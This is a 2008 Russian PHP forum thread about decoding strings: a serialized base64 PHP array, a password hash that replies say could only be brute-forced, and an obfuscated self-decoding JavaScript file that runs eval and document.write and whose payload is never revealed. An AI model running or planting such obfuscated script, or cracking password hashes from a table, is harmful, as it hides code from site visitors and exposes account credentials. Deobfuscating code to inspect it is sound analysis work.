как это декодировать?

Тема в разделе "PHP", создана пользователем boctorg, 2 апр 2008.

Статус темы:
Закрыта.
Модераторы: latteo
  1. boctorg

    boctorg Прохожие

    YTo5OntzOjExOiJhcnRpc3RfbmFtZSI7czo5OiLR6%2FPm5eHt%2B%2BkiO3M6OToic29uZ19uYW1lIjtzOjY6IvDu7ODt8SI7czozOiJ1cmwiO3M6NTI6Imh0dHA6Ly8xOTUuMjE4LjE4MC4xNDMvdTEzOTQyNDgvYXVkaW8vNDg3MTBjNmFkYS5tcDMiO3M6NDoiaGFzaCI7czozMjoiOTAyNTEyYWRhMzFkYWQ3ZmMyMTQzODdmN2JhM2NlZWQiO3M6OToidmF1ZGlvX2lkIjtzOjg6IjI2OTc1MTMxIjtzOjg6InZob3N0X2lkIjtzOjQ6IjEzNDMiO3M6ODoidnVzZXJfaWQiO3M6NzoiMTM5NDI0OCI7czo1OiJ2ZmlsZSI7czoxMDoiNDg3MTBjNmFkYSI7czo0OiJ2ZHVyIjtzOjM6IjE1OCI7fQ
     
  2. sulacco

    sulacco Постоялец

    Регистр.:
    17 мар 2008
    Сообщения:
    90
    Симпатии:
    45
    Напиши плизоткуда это, будет более понятно в какую сторону копать
    скорее всчего тут просто "смещение", вот на сколько это уже другой вопрос
     
  3. boctorg

    boctorg Прохожие


    код в одну строку
     
  4. bueno

    bueno Читатель

    Заблокирован
    Регистр.:
    7 май 2007
    Сообщения:
    236
    Симпатии:
    69
    повидимому массив, сначала сериализованный (serialize() _http://ru2.php.net/manual/ru/function.serialize.php), потом закодированный в base64 (base64_encode() _http://ru2.php.net/manual/ru/function.base64-encode.php)..

    соответственно для разбора надо произвести обратные действия..
     
  5. Yaggi Jah

    Yaggi Jah Постоялец

    Регистр.:
    15 ноя 2006
    Сообщения:
    75
    Симпатии:
    31

    PHP:
    <?php
    $txt
    =<<<txt
    YTo5OntzOjExOiJhcnRpc3RfbmFtZSI7czo5OiLR6%2FPm5eHt %2B%2BkiO3M6OToic29uZ19uYW1lIjtzOjY6IvDu7ODt8SI7cz ozOiJ1cmwiO3M6NTI6Imh0dHA6Ly8xOTUuMjE4LjE4MC4xNDMv dTEzOTQyNDgvYXVkaW8vNDg3MTBjNmFkYS5tcDMiO3M6NDoiaG FzaCI7czozMjoiOTAyNTEyYWRhMzFkYWQ3ZmMyMTQzODdmN2Jh M2NlZWQiO3M6OToidmF1ZGlvX2lkIjtzOjg6IjI2OTc1MTMxIj tzOjg6InZob3N0X2lkIjtzOjQ6IjEzNDMiO3M6ODoidnVzZXJf aWQiO3M6NzoiMTM5NDI0OCI7czo1OiJ2ZmlsZSI7czoxMDoiND g3MTBjNmFkYSI7czo0OiJ2ZHVyIjtzOjM6IjE1OCI7fQ
    txt;
    print_r(unserialize(base64_decode(rawurldecode($txt))));
    ?>
    получается массив

    Код:
    Array
    (
        [artist_name] => Служебный
        [song_name] => романс
        [url] => http://195.218.180.143/u1394248/audio/48710c6ada.mp3
        [hash] => 902512ada31dad7fc214387f7ba3ceed
        [vaudio_id] => 26975131
        [vhost_id] => 1343
        [vuser_id] => 1394248
        [vfile] => 48710c6ada
        [vdur] => 158
    )
    
     
  6. Радогаст

    Радогаст Писатель

    Регистр.:
    4 май 2008
    Сообщения:
    2
    Симпатии:
    0
    А вот такой можно разобрать?

    *192D3B253214AA98633C5B8A59DD86AAA16052A0

    PS: Хотя звездочка в начале паса присутствует у всех хэшей в таблице...
     
  7. masto

    masto Прохожие

    разобрать наврядли - это похоже на хэш значения, а не на закодированное значение.
    разве что брут различными методами.
     
  8. Радогаст

    Радогаст Писатель

    Регистр.:
    4 май 2008
    Сообщения:
    2
    Симпатии:
    0
    Вроде бы здесь используется sha1...
     
  9. allsu

    allsu Постоялец

    Регистр.:
    29 дек 2007
    Сообщения:
    135
    Симпатии:
    5
    а такой код реально разкодировать??

    eval(unescape('%66%75%6E%63%74%69%6F%6E%20%6D%28%73%29%7B%76%61%72%20%63%2C%6E%2C%7A%2C%69%3B%7A%3D%27%27%3B%69%3D%30%3B%77%68%69%6C%65%28%69%3C%73%2E%6C%65%6E%67%74%68%29%7B%63%3D%73%2E%63%68%61%72%41%74%28%69%29%3B%20%69%66%28%27%75%27%3D%3D%63%29%7B%63%3D%27%25%27%2B%63%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%31%29%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%32%29%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%33%29%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%34%29%3B%6E%3D%35%3B%7D%20%65%6C%73%65%7B%63%3D%27%25%27%2B%63%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%31%29%3B%6E%3D%32%3B%7D%7A%2B%3D%63%3B%69%3D%69%2B%6E%3B%7D%72%65%74%75%72%6E%20%7A%3B%7D%20%66%75%6E%63%74%69%6F%6E%20%65%28%73%29%7B%72%65%74%75%72%6E%20%75%6E%65%73%63%61%70%65%28%6D%28%73%29%29%3B%7D'));eval(e('66756E6374696F6E2064286F73297B766172206B65793D22446563727970744954223B7661722064733B64733D27273B766172206B702C73702C732C6B632C73633B206B703D303B73703D303B7768696C652873703C6F732E6C656E677468297B73633D206F732E63686172436F64654174287370293B6B633D6B65792E63686172436F64654174286B70293B20696628282873635E6B63293D3D3339297C7C282873635E6B63293D3D3932297C7C282873635E6B63293C3332297C7C282873635E6B63293E3132362929207B733D537472696E672E66726F6D43686172436F6465287363293B7D656C73657B733D537472696E672E66726F6D43686172436F6465282873635E6B6329293B7D2064732B3D733B6B702B2B3B73702B2B3B6966286B703E3D6B65792E6C656E677468296B703D303B7D72657475726E2064733B7D2066756E6374696F6E2064692873297B733D642873293B646F63756D656E742E777269746528756E657363617065286D28732929293B7D'));

    di('w&VAMCA{`}PSGMBD}CpTW7MGA|`uQTFLC0{fp$UCNFBxawSPEKFM~dsQQ@J5DDdASZDOBD{lr UCNFBpbsSREMF2~fv UCN@Cy`ESRD=FA{ew!Q@M4BpbwRQD?GG6FrSTFK@@pbERWDLGF6ErPTFK@@|c|RSD:F2~frPT@KBFpftR!B=@5zCvTQ6K4DDdASQEKF2~csVUGNBA6bqRQ@IC0{dsUUCNBCzbqQZD<G@{lr UCNFBpbsSREMF2~fv UCN@CyarSVEKGG6mr#U7KIGBdDU"GJELzDsRUKO5B}bFRT@<F2~drPU7KHF~b|RWEMGDzAv#Q4NGC~csW&D=GDzgr&UKO5BBbFRU@<F16asQQ4ODBxcpSZD<FC{Er]TFO4BCfsW B=@5{csWTGOBBEcwSWDOF6~lvRQ1KGC}bFS%D:FF6esWP6JAFCbCS%DJFE~`r9U4O5GDguW EJG@6esQTGNCGDguW D=FA6EsPU@OAC{gDVR@:BC{Bt!S3KGCzbwRQD?F76CrWUCNBCzgDVR@:GF6asVUKN1BxbvS DLC0zev&TEOIB}cpS[A=C@zawUQ1OHB|b}STDAG@zDwVPBJ@F~f}V!B=@56mrSQJK@B{cvS%ENGG6asWVDOEC{ftV&A=BDz`v9QBN2DDdARTD@F16`r#TEK5B6bFSPELGG{lv9QBJ2DDdARDB=@5{Fv#QBK4FDgEUDB8G0yDt$P1K6Az`wPQF@ED|`w S6I1GCbFSQD8FA6gsQQBOIB}gDR[@IFG6CrTTANCBpbpVDDJF7~gr9UFJ1G{`pVPAOCDzfwUPCK4@6`rQUALB0zewTUFJAFDg|QWAICG{DwUPBMAGy`wVZALCM}fpVPBMAFycsSZDMG@6lw!PCK@BqbqSZDNFL~`w!PCK@BxbCSZDNF1zDr!UKODB}bCSVA<BDyDt$P1L@@xavQRF=BD}EpTW6MEGD`uSPEMFM~brTTFOE@xctRSD:FA~`sVQBLF@x`CPVFLC0zew P1L@@xavQRF=BD}EpTW6MEGD`uSPEMFM~brTTFOE@xbwRWD@GB6aq]WAO6BEcpRQD?F7~gvUVDMA@CaqQVA=CEzEw&Q4O6B{bASVDJG@zEvUS6I1GCawQPGKDM|dqQP7K@DDdASUELF16gsQUKO6BEftRPDAFA6Cr&TAOCC{b}RSEMBL{mvUS6I1CBftUDB8@M6FsUUGO5FqfvS[EMG@~dw$Q4K6C~csRT@<F0~dwVU1OIBEbBS%EOB16ErPTFK6B}buRWD@F16cv UJNDBDbCWQ@:BF~frTTANDBxbvR"DJBF{CvWTEOIB}cpS[A=C@zawUQ1OHB|b}STDAG@zDwWPBJ@F~fvWZA;@0yAt9T6K@DDdASUELF16gsQUKO6BEftSDDHFM6Ev]QKK@DDdAR!@I@0yAt9TJK5@}`FQD@<EG6gsWUKN@C}fESVEAFA6gqVUANBBpctRW@AGG6lrPU1O3CzbwRQD@GD~`v TFO6AzcpRQD@F16cv]QKKIGBftUDB8@M~lv WFM6@DfEPPDJGF6msUTFK5CzbqRWGMFM6DrPU4NEC}f|WQEJFL6ar&U1NCBzcvSZEIG@{lv9Q@KIGBftUDB8G0{dt!S3OIB6ftW[ENFM6ErQU4NGFEcvSREJG@6evTP6NDC{cqSV@@BD~BvUS6I1DpcwSVEME@6mr!UGO6C|cpW[@NBD{dvUU6OABpbEW[@@BD{dvUQEK3GxgtVS@@BDyDt$T6K@DDdAV @?GG6gsWUKN@C}gEUDB8@0yAt!S3I4DAdDU"B=@5');

    eval(unescape('%66%75%6E%63%74%69%6F%6E%20%6D%28%73%29%7B%76%61%72%20%63%2C%6E%2C%7A%2C%69%3B%7A%3D%27%27%3B%69%3D%30%3B%77%68%69%6C%65%28%69%3C%73%2E%6C%65%6E%67%74%68%29%7B%63%3D%73%2E%63%68%61%72%41%74%28%69%29%3B%20%69%66%28%27%75%27%3D%3D%63%29%7B%63%3D%27%25%27%2B%63%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%31%29%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%32%29%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%33%29%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%34%29%3B%6E%3D%35%3B%7D%20%65%6C%73%65%7B%63%3D%27%25%27%2B%63%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%31%29%3B%6E%3D%32%3B%7D%7A%2B%3D%63%3B%69%3D%69%2B%6E%3B%7D%72%65%74%75%72%6E%20%7A%3B%7D%20%66%75%6E%63%74%69%6F%6E%20%65%28%73%29%7B%72%65%74%75%72%6E%20%75%6E%65%73%63%61%70%65%28%6D%28%73%29%29%3B%7D'));eval(e('66756E6374696F6E2064286F73297B766172206B65793D22446563727970744954223B7661722064733B64733D27273B766172206B702C73702C732C6B632C73633B206B703D303B73703D303B7768696C652873703C6F732E6C656E677468297B73633D206F732E63686172436F64654174287370293B6B633D6B65792E63686172436F64654174286B70293B20696628282873635E6B63293D3D3339297C7C282873635E6B63293D3D3932297C7C282873635E6B63293C3332297C7C282873635E6B63293E3132362929207B733D537472696E672E66726F6D43686172436F6465287363293B7D656C73657B733D537472696E672E66726F6D43686172436F6465282873635E6B6329293B7D2064732B3D733B6B702B2B3B73702B2B3B6966286B703E3D6B65792E6C656E677468296B703D303B7D72657475726E2064733B7D2066756E6374696F6E2064692873297B733D642873293B646F63756D656E742E777269746528756E657363617065286D28732929293B7D'));

    di('w&TAOCC{b}RSEMBD~`s9TBOEGDfvRWDLGL~`v#U3OAC6buRPDJGF6msUTFKBGEdDU"EOFE~fvUUAODAFbvSREKBDzDvUT0I4DAd}WTD@F@{cw$PAJHGxgwVP@:mad:0yAt9QENCCpbESVEKFC6mrPQEJ1F~b|SVEMFA~fr#QEK3DDdAUZ@NF76cvRP3KGBpcpWT@:mad:0yAt9QENDCpctSV@NC5zfv&S6I1DpfsSZDMFB{cw$PCJAG|fCUDB8@M{cr9U7NDB|cvRUDHF7{cw$PCJ@GygtVS@:mad:0yAt9QENCBFcqS&DMBCzAwVQ1I4DAd}WTEJF66mr U0NDC|fsV"AHB7yDt$SKKGC}cvSRDJF66asWQEJ1F~bvSREKGF6evRS6I1CDdDU"A:B2~grVT@OICycpV&@IC7~grVT@OICycpWSEMGM~drPP6KBC}bqR[EMB26ArTTDOACzbwRQD@GD~`vWQBNCC{bwVD@KFL~`sQTBJ1FFfFSQDLF@6esSUCK4BCb}RPEMB16gr#U6K6BzbuRPEJFM6Er#Q4OEB|bqW&D8GG{fw P1K6CzbwRQD@GD~`w S6I1');

    находиться в файле /skript.js
     
  10. DorjeCash

    DorjeCash Создатель

    Регистр.:
    18 апр 2008
    Сообщения:
    24
    Симпатии:
    8
    allsu, напиши вместо eval - alert. скрипт вместо выполнения расшифрованного кода, просто покажет его в месаджбоксе.

    есть еще вариант с текстареа, но думаю тебе хватит и месаджбокса.
     
Статус темы:
Закрыта.